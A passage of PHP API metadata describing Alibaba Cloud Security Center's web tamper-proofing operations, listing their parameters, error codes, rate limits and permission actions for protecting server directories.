'acs:yundun-sas:{#regionId}:{#accountId}:weblockconfig/{#Uuid}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D9354C1A-D709-4873-9AAE-41513327B247\\",\\n \\"ConfigId\\": \\"1404656\\"\\n}","type":"json"}]', ], 'ModifyWebLockDeleteConfig' => [ 'summary' => 'Deletes a protected directory from a specified server.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92401', 'abilityTreeNodes' => ['FEATUREsas4GT4R7'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for requests and responses. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the protected directory to delete.'."\n" .'> You can call the [DescribeWebLockConfigList](~~DescribeWebLockConfigList~~) operation to obtain the ID of the protected directory.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '12', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server from which you want to delete the protected directory.'."\n" .'> You can call the [DescribeWebLockConfigList](~~DescribeWebLockConfigList~~) operation to obtain the UUID of the server.', 'type' => 'string', 'required' => true, 'example' => '7f7fe9a2-55de-4b9d-a37a-0d981d36****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters for deleting a protected directory from a specified server.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '299D0992-271A-5750-ACEB-46D322862BFF', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'DefenceAtLeastOneConfig', 'errorMessage' => 'At least one protection directory is needed.', 'description' => ''], ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'InternalError', 'errorMessage' => 'The request processing has failed due to some unknown error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Delete a protected directory from a specified server', 'description' => 'After you delete a protected directory from a server, tamper-proofing no longer protects the files in the directory. The website information on your server may be maliciously tampered with. Proceed with caution.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyWebLockDeleteConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyWebLockDeleteConfig', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'WebLockConfig', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:weblockconfig/{#Uuid}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"299D0992-271A-5750-ACEB-46D322862BFF\\"\\n}","type":"json"}]', ], 'ModifyWebLockProcessStatus' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92402', 'abilityTreeNodes' => ['FEATUREsas4GT4R7'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'OperateInfo', 'in' => 'query', 'schema' => ['description' => 'The operation parameters for batch setting the tamper-proofing process status. The value is in JSON format.', 'type' => 'string', 'required' => false, 'example' => '[{"processPath":"/etc/test1","uuid":"0c1714dc-f7a3-4265-8364-7aa3fce8****"},{"processPath":"/etc/test2","uuid":"1cc45e7d-7698-4b2c-89d8-e8cba407****"}]', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server for which you want to set the tamper-proofing process status.', 'type' => 'string', 'required' => false, 'example' => 'bc8510e7-7327-4030-b75c-956e434d****', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The status of the tamper-proofing process. Valid values:'."\n" .'- **0**: Remove from the whitelist.'."\n" .'- **1**: Add to the whitelist.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'DealAll', 'in' => 'query', 'schema' => ['description' => 'The identity is simultaneous processing of servers that have the same process. Valid values:'."\n" .'- **0**: Do not use simultaneous processing.'."\n" .'- **1**: Use simultaneous processing.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'ProcessPath', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of process paths.', 'type' => 'array', 'items' => ['description' => 'The process path.', 'type' => 'string', 'required' => false, 'example' => '/test', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '6A540B52-2441-5493-902B-37376C412776', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Set tamper-proofing process status', 'summary' => 'Sets the status of a tamper-proofing process.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyWebLockProcessStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyWebLockProcessStatus', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'WebLockBind', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:weblockbind/{#Uuid}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"6A540B52-2441-5493-902B-37376C412776\\"\\n}","type":"json"}]', ], 'ModifyWebLockRefresh' => [ 'summary' => 'Refreshes the status of the web tamper proofing feature for a server.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92403', 'abilityTreeNodes' => ['FEATUREsas4GT4R7'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server for which you want to refresh the status of the web tamper proofing feature.'."\n" ."\n" .'> You can call the [DescribeWebLockBindList](~~DescribeWebLockBindList~~) operation to query the servers for which the web tamper proofing feature is enabled.'."\n", 'type' => 'string', 'required' => false, 'example' => '55c0f41b-3093-47a7-8eae-02d3a584****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '1CF8C834-8028-5E01-96E2-0F065EA99F6D', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'DefenceEmptyConfig', 'errorMessage' => 'At least one protection directory is needed.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'InternalError', 'errorMessage' => 'The request processing has failed due to some unknown error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1CF8C834-8028-5E01-96E2-0F065EA99F6D\\"\\n}","type":"json"}]', 'title' => 'ModifyWebLockRefresh', 'description' => 'If an exception occurs when you enable or disable the web tamper proofing feature for a server, you can call this operation to refresh the status of the web tamper proofing feature.'."\n", 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyWebLockRefresh'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyWebLockRefresh', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'WebLockBind', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:weblockbind/{#Uuid}'], ], ], ], ], ], 'ModifyWebLockStart' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92404', 'abilityTreeNodes' => ['FEATUREsas4GT4R7'], ], 'parameters' => [ [ 'name' => 'Mode', 'in' => 'query', 'schema' => ['description' => 'The protection type. Valid values:'."\n" .'- **whitelist**: whitelist mode. Protects the specified protection directories and file types.'."\n" .'- **blacklist**: blacklist mode. Protects all subdirectories, file types, and specified files in the protection directories that are not excluded.', 'type' => 'string', 'required' => true, 'example' => 'whitelist', 'title' => ''], ], [ 'name' => 'LocalBackupDir', 'in' => 'query', 'schema' => ['description' => 'The local backup path used to back up the protection directories. The format of the protection directory path may differ between Linux servers and Windows servers. Make sure that you enter the path in the correct format. The following examples show the directory formats:'."\n" .' - Linux server: /usr/local/aegis/bak'."\n" .' - Windows server: C:\\Program Files (x86)\\Alibaba\\Aegis\\bak.', 'type' => 'string', 'required' => true, 'example' => '/usr/local/backup', 'title' => ''], ], [ 'name' => 'ExclusiveFile', 'in' => 'query', 'schema' => ['description' => 'The files that do not require web tamper proofing protection (excluded files).'."\n" .'> This parameter is required when the Defense mode **Mode** is set to the **blacklist** pattern.', 'type' => 'string', 'required' => false, 'example' => '/home/admin/tomcat/localhost.log', 'title' => ''], ], [ 'name' => 'Dir', 'in' => 'query', 'schema' => ['description' => 'The protection directories. Separate multiple directories with commas (,).', 'type' => 'string', 'required' => true, 'example' => '/home/admin/tomcat', 'title' => ''], ], [ 'name' => 'InclusiveFileType', 'in' => 'query', 'schema' => ['description' => 'The file types that require web tamper proofing protection. Separate multiple file types with commas (,). Valid values:'."\n" .'- php'."\n" .'- jsp'."\n" .'- asp'."\n" .'- aspx'."\n" .'- js'."\n" .'- cgi'."\n" .'- html'."\n" .'- htm'."\n" .'- xml'."\n" .'- shtml'."\n" .'- shtm'."\n" .'- jpg'."\n" .'- gif'."\n" .'- png'."\n" ."\n" .'> This parameter is required when the Defense mode **Mode** is set to the **whitelist** pattern.', 'type' => 'string', 'required' => false, 'example' => 'php', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server that you want to protect.', 'type' => 'string', 'required' => true, 'example' => '80d2f7d6-31a9-4d7f-8ff4-7ecc42f89ca****', 'title' => ''], ], [ 'name' => 'ExclusiveFileType', 'in' => 'query', 'schema' => ['description' => 'The file types that do not require web tamper proofing protection (excluded file types). Separate multiple file types with commas (,). Valid values:'."\n" .'- php'."\n" .'- jsp'."\n" .'- asp'."\n" .'- aspx'."\n" .'- js'."\n" .'- cgi'."\n" .'- html'."\n" .'- htm'."\n" .'- xml'."\n" .'- shtml'."\n" .'- shtm'."\n" .'- jpg'."\n" .'- gif'."\n" .'- png'."\n" ."\n" .'> This parameter is required when the Defense mode **Mode** is set to the **blacklist** pattern.', 'type' => 'string', 'required' => false, 'example' => 'jpg', 'title' => ''], ], [ 'name' => 'ExclusiveDir', 'in' => 'query', 'schema' => ['description' => 'The folder that does not require web tamper proofing protection (excluded folder).'."\n" .'> This parameter is required when the Defense mode **Mode** is set to the **blacklist** pattern.', 'type' => 'string', 'required' => false, 'example' => '/home/admin/java', 'title' => ''], ], [ 'name' => 'DefenceMode', 'in' => 'query', 'schema' => ['description' => 'The defense mode. Valid values:'."\n" ."\n" .'- **block**: block'."\n" .'- **audit**: alert.', 'type' => 'string', 'required' => true, 'example' => 'block', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'D9354C1A-D709-4873-9AAE-41513327B247', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ['errorCode' => 'DuplicatedDirectory', 'errorMessage' => 'Duplicated directory', 'description' => ''], ['errorCode' => 'NeedBuy', 'errorMessage' => 'This service shoule be purchased first.', 'description' => ''], ['errorCode' => 'DefenceEmptyConfig', 'errorMessage' => 'At least one protection directory is needed.', 'description' => ''], ['errorCode' => 'DefenceAuthLimit', 'errorMessage' => 'The number of machines has reached the upper limit.', 'description' => ''], ['errorCode' => 'BindDataExist', 'errorMessage' => 'The binding data already exists.', 'description' => ''], ['errorCode' => 'MissingDir', 'errorMessage' => 'Dir is mandatory for this action.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'InternalError', 'errorMessage' => 'The request processing has failed due to some unknown error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Create web tamper proofing protection for a server and enable the protection', 'summary' => 'Creates web tamper proofing protection for a specified server and enables the protection.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyWebLockStart'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyWebLockStart', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'WebLockBind', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:weblockbind/{#Uuid}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D9354C1A-D709-4873-9AAE-41513327B247\\"\\n}","type":"json"}]', ], 'ModifyWebLockStatus' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas4GT4R7'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '125.71.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for requests and responses. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server for which you want to modify the brute-force attacks prevention status.'."\n" .'You can invoke the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain the UUID of the server.', 'type' => 'string', 'required' => true, 'example' => 'inet-1234567****', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The protection status of the server. Valid values:'."\n" .'- **on**: Enables protection.'."\n" .'- **off**: Shuts down protection. '."\n" ."\n" .'> After you shut down web tamper-proofing for the server, a tamper-proofing authorization quota is released.', 'type' => 'string', 'required' => true, 'example' => 'on', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'D9354C1A-D709-4873-9AAE-41513327B247', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NeedBuy', 'errorMessage' => 'This service should be purchased first.', 'description' => ''], ['errorCode' => 'DefenceEmptyConfig', 'errorMessage' => 'At least one protection directory is needed.', 'description' => ''], ['errorCode' => 'DefenceAuthLimit', 'errorMessage' => 'The number of machines has reached the upper limit.', 'description' => ''], ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'InternalError', 'errorMessage' => 'The request processing has failed due to some unknown error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify web tamper-proofing status', 'summary' => 'Enables or shuts down web tamper-proofing for a server.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyWebLockStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyWebLockStatus', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'WebLockBind', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:weblockbind/{#Uuid}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D9354C1A-D709-4873-9AAE-41513327B247\\"\\n}","type":"json"}]', ], 'ModifyWebLockUnbind' => [ 'summary' => 'Removes the web tamper proofing protection folder from a specified server.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas4GT4R7'], ], 'parameters' => [ [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server from which you want to remove the protection directories.'."\n" .'> Call [DescribeWebLockBindList](~~DescribeWebLockBindList~~) to obtain the UUID of the server.', 'type' => 'string', 'required' => false, 'example' => '8d217d3f-6999-43a6-a435-c7a6854180e9', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. It is a unique identifier that Alibaba Cloud generates for the request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => 'F0A8A039-930D-5EC1-97C8-43F05776188A', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'InvalidBind', 'errorMessage' => 'Asset not bind.', 'description' => ''], ['errorCode' => 'StillOn', 'errorMessage' => 'Still switched on.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'InternalError', 'errorMessage' => 'The request processing has failed due to some unknown error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Remove web tamper proofing from a server', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyWebLockUnbind'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyWebLockUnbind', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'WebLockBind', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:weblockbind/{#Uuid}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F0A8A039-930D-5EC1-97C8-43F05776188A\\"\\n}","type":"json"}]', ], 'ModifyWebLockUpdateConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92407', 'abilityTreeNodes' => ['FEATUREsas4GT4R7'], 'tenantRelevance' => 'tenant', ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '36.112.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the protected directory configuration that you want to modify.'."\n" .'> You can call the [DescribeWebLockConfigList](~~DescribeWebLockConfigList~~) operation to obtain the ID of the protected directory.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '312077', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server whose protected directory you want to modify.'."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain the UUID of the server.', 'type' => 'string', 'required' => true, 'example' => '4fe8e1cd-3c37-4851-b9de-124da32c****', 'title' => ''], ], [ 'name' => 'Dir', 'in' => 'query', 'schema' => ['description' => 'The full path of the directory that you want to protect.', 'type' => 'string', 'required' => true, 'example' => '/home/admin/tomcat', 'title' => ''], ], [ 'name' => 'ExclusiveDir', 'in' => 'query', 'schema' => ['description' => 'The directory that does not require web tamper-proofing protection (excluded directory).'."\n" .'> This parameter is required when the protection pattern **Mode** is set to **blacklist**.', 'type' => 'string', 'required' => false, 'example' => '/home/admin/test', 'title' => ''], ], [ 'name' => 'ExclusiveFileType', 'in' => 'query', 'schema' => ['description' => 'The file types that do not require web tamper-proofing protection (excluded file types). Separate multiple file types with semicolons (;). Valid values:'."\n" .'- php'."\n" .'- jsp'."\n" .'- asp'."\n" .'- aspx'."\n" .'- js'."\n" .'- cgi'."\n" .'- html'."\n" .'- htm'."\n" .'- xml'."\n" .'- shtml'."\n" .'- shtm'."\n" .'- jpg'."\n" .'- gif'."\n" .'- png'."\n" ."\n" .'> This parameter is required when the protection pattern **Mode** is set to **blacklist**.', 'type' => 'string', 'required' => false, 'example' => 'jpg', 'title' => ''], ], [ 'name' => 'LocalBackupDir', 'in' => 'query', 'schema' => ['description' => 'The local backup path for securely backing up the protected directory. '."\n" .'The format of the directory path may differ between Linux servers and Windows servers. Make sure that you enter the correct format. Refer to the following directory formats:'."\n" .' - Linux server: /usr/local/aegis/bak'."\n" .' - Windows server: C:\\Program Files (x86)\\Alibaba\\Aegis\\bak.', 'type' => 'string', 'required' => true, 'example' => '/usr/local/backup', 'title' => ''], ], [ 'name' => 'Mode', 'in' => 'query', 'schema' => ['description' => 'The protection pattern. Valid values:'."\n" .'- **whitelist**: whitelist mode. Protects only the specified directories and file types.'."\n" .'- **blacklist**: blacklist mode. Protects all subdirectories, file types, and files under the specified directory except those that are excluded.', 'type' => 'string', 'required' => false, 'example' => 'blacklist', 'title' => ''], ], [ 'name' => 'InclusiveFileType', 'in' => 'query', 'schema' => ['description' => 'The file types that require web tamper-proofing protection. Separate multiple file types with semicolons (;). Valid values:'."\n" .'- php'."\n" .'- jsp'."\n" .'- asp'."\n" .'- aspx'."\n" .'- js'."\n" .'- cgi'."\n" .'- html'."\n" .'- htm'."\n" .'- xml'."\n" .'- shtml'."\n" .'- shtm'."\n" .'- jpg'."\n" .'- gif'."\n" .'- png'."\n" ."\n" .'> This parameter is required when the protection pattern **Mode** is set to **whitelist**.', 'type' => 'string', 'required' => false, 'example' => 'jpg', 'title' => ''], ], [ 'name' => 'ExclusiveFile', 'in' => 'query', 'schema' => ['description' => 'The file that does not require web tamper-proofing protection (excluded file).'."\n" .'> This parameter is required when the protection pattern **Mode** is set to **blacklist**.', 'type' => 'string', 'required' => false, 'example' => '/home/admin/apache.log', 'title' => ''], ], [ 'name' => 'InclusiveFile', 'in' => 'query', 'schema' => ['description' => 'The file that requires protection.'."\n" .'> This parameter is required when the protection pattern **Mode** is set to **whitelist**.', 'type' => 'string', 'required' => false, 'example' => '/home/admin/test.log', 'title' => ''], ], [ 'name' => 'DefenceMode', 'in' => 'query', 'schema' => ['description' => 'The defense mode. Valid values:'."\n" ."\n" .'- **block**: Block.'."\n" .'- **audit**: Alert.', 'type' => 'string', 'required' => true, 'example' => 'block', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'D9354C1A-D709-4873-9AAE-41513327B247', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'DuplicatedDirectory', 'errorMessage' => 'Duplicated directory', 'description' => ''], ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ['errorCode' => 'DataNotExists', 'errorMessage' => 'data not exist', 'description' => ''], ['errorCode' => 'ParentOrSubDirectoryProtected', 'errorMessage' => 'Parent or child directories have been protected.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'RpcServiceError', 'errorMessage' => 'The internal service invocation is abnormal.', 'description' => ''], ['errorCode' => 'InternalError', 'errorMessage' => 'The request processing has failed due to some unknown error.', 'description' => ''], ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify the protection policy of a specified server', 'summary' => 'Modifies the protection policy of a specified server.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ModifyWebLockUpdateConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:ModifyWebLockUpdateConfig', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'WebLockConfig', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:weblockconfig/{#Uuid}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"D9354C1A-D709-4873-9AAE-41513327B247\\"\\n}","type":"json"}]', ], 'ModifyWebPath' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '92408', 'abilityTreeNodes' => ['FEATUREsas3VVW1Q'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the configuration item. Set the value to **web_path**.'."\n", 'type' => 'string', 'required' => false, 'example' => 'web_path', 'title' => ''], ], [ 'name' => 'Config', 'in' => 'query', 'schema' => ['description' => 'The configuration of the web directory. The value of this parameter is in the JSON format and contains the following fields:'."\n" ."\n" .'* **webPathType**: the type of the web directory'."\n" .'* **webPath**: the web directory'."\n", 'type' => 'string', 'required' => false, 'example' => '{'."\n" .' "webPathType": "customize",'."\n" .' "webPath": "/root/www****"'."\n" .'}', 'title' => ''], ], [ 'name' => 'Target', 'in' => 'query', 'schema' => ['description' => 'The protected asset to which the web directory belongs. The value of this parameter is in the JSON format and contains the following fields:'."\n" ."\n" .'* **target**: the protected asset.'."\n" .'* **targetType**: the type of the asset. Set the value to uuid.'."\n" .'* **flag**: the type of the operation.'."\n", 'type' => 'string', 'required' => false, 'example' => '[{"target":"0186127a-d33e-4d0c-94fb-8f25f87bc69f","targetType":"uuid","flag":"add"}]', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => 